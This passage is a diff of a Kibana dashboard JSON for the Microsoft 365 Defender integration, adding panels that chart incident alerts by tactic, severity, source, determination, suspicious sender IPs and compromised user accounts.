@@ -432,10 +635,14 @@ }, "orderDirection": "desc", "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], "size": 6 }, "scale": "ordinal", - "sourceField": "m365_defender.incident.severity" + "sourceField": "event.severity" }, "df079051-f9c4-455e-9b45-991460a206a2": { "customLabel": true, @@ -461,7 +668,7 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "b5cb2c9c-2731-4f8b-8001-4c674d131b67", + "index": "20ea0ba5-f3a2-45a8-8af1-00ccb757801f", "key": "data_stream.dataset", "negate": false, "params": { @@ -524,7 +731,7 @@ "i": "b2cc378e-bce4-4769-9778-2f7f4fcb0f9b", "w": 24, "x": 24, - "y": 8 + "y": 22 }, "panelIndex": "b2cc378e-bce4-4769-9778-2f7f4fcb0f9b", "title": "Severity Over Time [Logs Microsoft 365 Defender]", @@ -656,7 +863,7 @@ "i": "e8dcdb05-dc55-4c3d-ba79-d043d3987e53", "w": 40, "x": 8, - "y": 27 + "y": 41 }, "panelIndex": "e8dcdb05-dc55-4c3d-ba79-d043d3987e53", "title": "Count of Incidents Over Time [Logs Microsoft 365 Defender]", @@ -803,7 +1010,7 @@ "i": "ae3a1a20-4ff4-4e3d-9bbc-ccb240662789", "w": 40, "x": 8, - "y": 43 + "y": 57 }, "panelIndex": "ae3a1a20-4ff4-4e3d-9bbc-ccb240662789", "title": "Incident with Highest Count of Alerts [Logs Microsoft 365 Defender]", 
@@ -815,87 +1022,2029 @@ "enhancements": {} }, "gridData": { - "h": 32, + "h": 17, "i": "b3cf43f7-84a7-4d89-b9ca-8bbac00f67a0", "w": 40, "x": 8, - "y": 59 + "y": 73 }, "panelIndex": "b3cf43f7-84a7-4d89-b9ca-8bbac00f67a0", "panelRefName": "panel_b3cf43f7-84a7-4d89-b9ca-8bbac00f67a0", "type": "search", "version": "8.7.1" - } - ], - "timeRestore": false, - "title": "[Logs Microsoft 365 Defender] Incident", - "version": 1 - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-09-04T08:56:36.875Z", - "id": "m365_defender-ac54d310-44ab-11ed-8375-0168a9970c06", - "migrationVersion": { - "dashboard": "8.7.0" - }, - "references": [ - { - "id": "logs-*", - "name": "0bc0ee87-64be-46bf-89ac-3a3c17f3ab7e:indexpattern-datasource-layer-961a470c-6271-4d2f-b553-646b67834136", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "0bc0ee87-64be-46bf-89ac-3a3c17f3ab7e:22e1bd27-885c-4745-b12d-9381e438538f", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "09a42be0-f530-4662-a284-5ad7d3264935:indexpattern-datasource-layer-19999c0c-be9d-43ba-994a-72fadb61fabc", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "09a42be0-f530-4662-a284-5ad7d3264935:ce3e96ee-3a9d-477a-ac37-db9a950d836d", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "b2cc378e-bce4-4769-9778-2f7f4fcb0f9b:indexpattern-datasource-layer-f41e1d1a-0dc1-4416-b48b-a04c4e59d46c", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "b2cc378e-bce4-4769-9778-2f7f4fcb0f9b:b5cb2c9c-2731-4f8b-8001-4c674d131b67", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "e8dcdb05-dc55-4c3d-ba79-d043d3987e53:indexpattern-datasource-layer-a3705125-6c5c-43a6-a594-6d384c293ec9", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "e8dcdb05-dc55-4c3d-ba79-d043d3987e53:a77281bd-3237-4d8d-b908-18a4a562b070", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": 
"ae3a1a20-4ff4-4e3d-9bbc-ccb240662789:indexpattern-datasource-layer-7f55a9ab-9515-4d17-844d-c925b2ccdbd1", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "ae3a1a20-4ff4-4e3d-9bbc-ccb240662789:644633f8-cafb-4bfd-8a03-4a1e7c1146e7", - "type": "index-pattern" - }, - { - "id": "m365_defender-fcf25960-44af-11ed-8375-0168a9970c06", - "name": "b3cf43f7-84a7-4d89-b9ca-8bbac00f67a0:panel_b3cf43f7-84a7-4d89-b9ca-8bbac00f67a0", + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2fa8c035-1708-4d32-88fc-b59af7751db4", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d7bb4468-3be1-458a-b9e0-bd84db7e308a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2fa8c035-1708-4d32-88fc-b59af7751db4": { + "columnOrder": [ + "ccf17a24-dc07-4800-983f-8c507665a6a0", + "87199ce0-75a4-414f-860f-7c25177fb5b3" + ], + "columns": { + "87199ce0-75a4-414f-860f-7c25177fb5b3": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + }, + "ccf17a24-dc07-4800-983f-8c507665a6a0": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Attack Kill-Chain Category", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "87199ce0-75a4-414f-860f-7c25177fb5b3", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.tactic.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "d7bb4468-3be1-458a-b9e0-bd84db7e308a", + "key": "data_stream.dataset", + "negate": false, + 
"params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "87199ce0-75a4-414f-860f-7c25177fb5b3" + ], + "layerId": "2fa8c035-1708-4d32-88fc-b59af7751db4", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "ccf17a24-dc07-4800-983f-8c507665a6a0" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "a567157d-8f3c-4fa5-b7a1-1caa3f9252b2", + "w": 24, + "x": 0, + "y": 90 + }, + "panelIndex": "a567157d-8f3c-4fa5-b7a1-1caa3f9252b2", + "title": "Distribution of Alerts by Category [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-874da7c4-ebe5-4c5c-a302-094d287b81bb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2128586b-14fe-4907-84a9-4c193f8a2c5f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "874da7c4-ebe5-4c5c-a302-094d287b81bb": { + "columnOrder": [ + "91075489-5815-4881-af42-d6e31205b1c5", + "2d7b439a-58f9-400c-b89a-c5ef01f6d82b" + ], + "columns": { + "2d7b439a-58f9-400c-b89a-c5ef01f6d82b": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "unique_count", + 
"scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + }, + "91075489-5815-4881-af42-d6e31205b1c5": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Severity", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "2d7b439a-58f9-400c-b89a-c5ef01f6d82b", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "m365_defender.incident.alert.severity" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "2128586b-14fe-4907-84a9-4c193f8a2c5f", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "874da7c4-ebe5-4c5c-a302-094d287b81bb", + "layerType": "data", + "legendDisplay": "show", + "legendSize": "auto", + "metrics": [ + "2d7b439a-58f9-400c-b89a-c5ef01f6d82b" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "91075489-5815-4881-af42-d6e31205b1c5" + ] + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "039e6ffc-d9bb-4bfb-9fde-a7dc9a7938bc", + "w": 24, + "x": 24, + "y": 90 + }, + "panelIndex": "039e6ffc-d9bb-4bfb-9fde-a7dc9a7938bc", + "title": "Distribution of Alerts by Severity [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + 
"name": "indexpattern-datasource-layer-bdba4af5-1396-46ec-ad04-59157e7697f9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a06ad11b-3d3e-48e1-bb6c-08f62f8b0b58", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "bdba4af5-1396-46ec-ad04-59157e7697f9": { + "columnOrder": [ + "a643f53b-fe39-4a6d-8916-e6eee4a3d30b", + "cd1300db-e9d8-41c8-9407-0159ec6e9410" + ], + "columns": { + "a643f53b-fe39-4a6d-8916-e6eee4a3d30b": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Service Source", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "cd1300db-e9d8-41c8-9407-0159ec6e9410", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "event.provider" + }, + "cd1300db-e9d8-41c8-9407-0159ec6e9410": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "a06ad11b-3d3e-48e1-bb6c-08f62f8b0b58", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "cd1300db-e9d8-41c8-9407-0159ec6e9410" + ], + "layerId": "bdba4af5-1396-46ec-ad04-59157e7697f9", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": 
"a643f53b-fe39-4a6d-8916-e6eee4a3d30b" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "7f825e05-faee-4ad4-9898-69cb1204cf89", + "w": 24, + "x": 0, + "y": 105 + }, + "panelIndex": "7f825e05-faee-4ad4-9898-69cb1204cf89", + "title": "Distribution of Alerts by Service Source [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-45d80486-c9c8-4d28-bbcd-5d29072c9cb9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "57b64179-81e7-4d61-b50b-23d21323b9da", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "45d80486-c9c8-4d28-bbcd-5d29072c9cb9": { + "columnOrder": [ + "fe4ba4cc-3a4f-4dbf-b79d-a3b6550f08b6", + "4315d7e5-cdd4-48a1-b1b6-cfb3cfe25389" + ], + "columns": { + "4315d7e5-cdd4-48a1-b1b6-cfb3cfe25389": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + }, + "fe4ba4cc-3a4f-4dbf-b79d-a3b6550f08b6": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Determination", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "4315d7e5-cdd4-48a1-b1b6-cfb3cfe25389", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "m365_defender.incident.alert.determination" 
+ } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "57b64179-81e7-4d61-b50b-23d21323b9da", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "4315d7e5-cdd4-48a1-b1b6-cfb3cfe25389" + ], + "layerId": "45d80486-c9c8-4d28-bbcd-5d29072c9cb9", + "layerType": "data", + "seriesType": "bar_stacked", + "xAccessor": "fe4ba4cc-3a4f-4dbf-b79d-a3b6550f08b6" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "8b6e0921-d74d-4fc1-83f4-04b15f37bef0", + "w": 24, + "x": 24, + "y": 105 + }, + "panelIndex": "8b6e0921-d74d-4fc1-83f4-04b15f37bef0", + "title": "Distribution of Alerts by Determination [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": 
"indexpattern-datasource-layer-24cc5824-23e2-462f-b38f-4769ea95322a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7a5d204e-cb61-4c0d-8923-28afeb2927a2", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "24cc5824-23e2-462f-b38f-4769ea95322a": { + "columnOrder": [ + "901ba472-02eb-4500-9ead-77371aa87f8c", + "4cccf049-88f6-486d-9cab-de68dd15ec01" + ], + "columns": { + "4cccf049-88f6-486d-9cab-de68dd15ec01": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + }, + "901ba472-02eb-4500-9ead-77371aa87f8c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Detection Source", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "4cccf049-88f6-486d-9cab-de68dd15ec01", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "m365_defender.incident.alert.detection_source" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "7a5d204e-cb61-4c0d-8923-28afeb2927a2", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "901ba472-02eb-4500-9ead-77371aa87f8c", + "isTransposed": false + }, + { + "columnId": "4cccf049-88f6-486d-9cab-de68dd15ec01", + "isTransposed": false + } + ], + "layerId": "24cc5824-23e2-462f-b38f-4769ea95322a", 
+ "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "2c9ca03f-7301-4749-9825-4b7871d90b21", + "w": 24, + "x": 0, + "y": 120 + }, + "panelIndex": "2c9ca03f-7301-4749-9825-4b7871d90b21", + "title": "Top 10 Detection Source that identified most of the Alerts [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-a0e68595-3ccc-4ff9-90fb-8087bc439020", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "742836c8-3532-4e18-b067-26e3af1b0e3b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "438f3787-c321-45a5-9cca-89571591b016", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "a0e68595-3ccc-4ff9-90fb-8087bc439020": { + "columnOrder": [ + "d8c5d781-6442-4a9f-b91b-8b7b29d8e73a", + "2c72b146-36c7-4143-baba-517b19d159bc" + ], + "columns": { + "2c72b146-36c7-4143-baba-517b19d159bc": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + }, + "d8c5d781-6442-4a9f-b91b-8b7b29d8e73a": { + "customLabel": true, + "dataType": "ip", + "isBucketed": true, + "label": "Email Sender IP", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "2c72b146-36c7-4143-baba-517b19d159bc", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "m365_defender.incident.alert.evidence.sender_ip" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" 
+ }, + "meta": { + "alias": null, + "disabled": false, + "index": "742836c8-3532-4e18-b067-26e3af1b0e3b", + "key": "m365_defender.incident.alert.evidence.verdict", + "negate": false, + "params": [ + "malicious", + "suspicious" + ], + "type": "phrases", + "value": [ + "malicious", + "suspicious" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "m365_defender.incident.alert.evidence.verdict": "malicious" + } + }, + { + "match_phrase": { + "m365_defender.incident.alert.evidence.verdict": "suspicious" + } + } + ] + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "438f3787-c321-45a5-9cca-89571591b016", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "d8c5d781-6442-4a9f-b91b-8b7b29d8e73a", + "isTransposed": false + }, + { + "columnId": "2c72b146-36c7-4143-baba-517b19d159bc", + "isTransposed": false + } + ], + "layerId": "a0e68595-3ccc-4ff9-90fb-8087bc439020", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "1a124e55-d897-4528-ad07-033d238e7460", + "w": 24, + "x": 24, + "y": 120 + }, + "panelIndex": "1a124e55-d897-4528-ad07-033d238e7460", + "title": "Top 10 Email Sender IP with Suspicious or Malicious Verdict [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": 
"indexpattern-datasource-layer-32a410b6-1ed8-4397-ab2e-151edec25e80", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "dbc8860d-394c-46cb-a626-67a20c1862c8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "32a410b6-1ed8-4397-ab2e-151edec25e80": { + "columnOrder": [ + "e278fc5e-3a46-416d-be86-884554b160dc", + "9c52de5e-c802-4a77-8cb4-b60368976cd9", + "43b50fb7-eed1-4a62-bd34-4922fa34c64e" + ], + "columns": { + "43b50fb7-eed1-4a62-bd34-4922fa34c64e": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + }, + "9c52de5e-c802-4a77-8cb4-b60368976cd9": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Severity", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "43b50fb7-eed1-4a62-bd34-4922fa34c64e", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 6 + }, + "scale": "ordinal", + "sourceField": "m365_defender.incident.alert.severity" + }, + "e278fc5e-3a46-416d-be86-884554b160dc": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "m365_defender.incident.alert.last_update_datetime" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "dbc8860d-394c-46cb-a626-67a20c1862c8", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } 
+ } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "43b50fb7-eed1-4a62-bd34-4922fa34c64e" + ], + "layerId": "32a410b6-1ed8-4397-ab2e-151edec25e80", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "9c52de5e-c802-4a77-8cb4-b60368976cd9", + "xAccessor": "e278fc5e-3a46-416d-be86-884554b160dc" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "80ad6adc-885a-471b-b9f1-ca6742177339", + "w": 24, + "x": 0, + "y": 135 + }, + "panelIndex": "80ad6adc-885a-471b-b9f1-ca6742177339", + "title": "Alert Severity Over Time [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d2d7332c-5fbd-4acc-bef9-a1f2a2a6a25d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "be5d6d70-2d76-4b3c-bc34-c27a83b81991", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d2d7332c-5fbd-4acc-bef9-a1f2a2a6a25d": { + "columnOrder": [ + "f65e2e2e-1d06-4965-871e-0c559e325343", + 
"26cd4cd0-0825-47aa-932b-e620a6329167" + ], + "columns": { + "26cd4cd0-0825-47aa-932b-e620a6329167": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + }, + "f65e2e2e-1d06-4965-871e-0c559e325343": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "m365_defender.incident.alert.last_update_datetime" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "be5d6d70-2d76-4b3c-bc34-c27a83b81991", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "26cd4cd0-0825-47aa-932b-e620a6329167" + ], + "layerId": "d2d7332c-5fbd-4acc-bef9-a1f2a2a6a25d", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "f65e2e2e-1d06-4965-871e-0c559e325343" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "e81b4ea3-793d-4827-a77a-df2c9bf006d5", + "w": 24, + "x": 24, + "y": 
135 + }, + "panelIndex": "e81b4ea3-793d-4827-a77a-df2c9bf006d5", + "title": "Count of Alerts Over Time [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-bf6ca0e6-4c26-4cff-b35c-a1a578a38d20", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "bfd73a62-e6c5-4126-9065-f4b17a1e4680", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "108199c0-a675-4fe1-87a9-4599aa85db91", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "bf6ca0e6-4c26-4cff-b35c-a1a578a38d20": { + "columnOrder": [ + "7048d5d3-a8bc-4b71-8b79-e51c6adc0350", + "471be050-ea96-4ce7-8cef-00ca90e6fbed" + ], + "columns": { + "471be050-ea96-4ce7-8cef-00ca90e6fbed": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + }, + "7048d5d3-a8bc-4b71-8b79-e51c6adc0350": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "User Account", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "471be050-ea96-4ce7-8cef-00ca90e6fbed", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "m365_defender.incident.alert.evidence.user_account.account_name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "bfd73a62-e6c5-4126-9065-f4b17a1e4680", + "key": "m365_defender.incident.alert.evidence.roles", + "negate": false, + "params": { + "query": "compromised" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + 
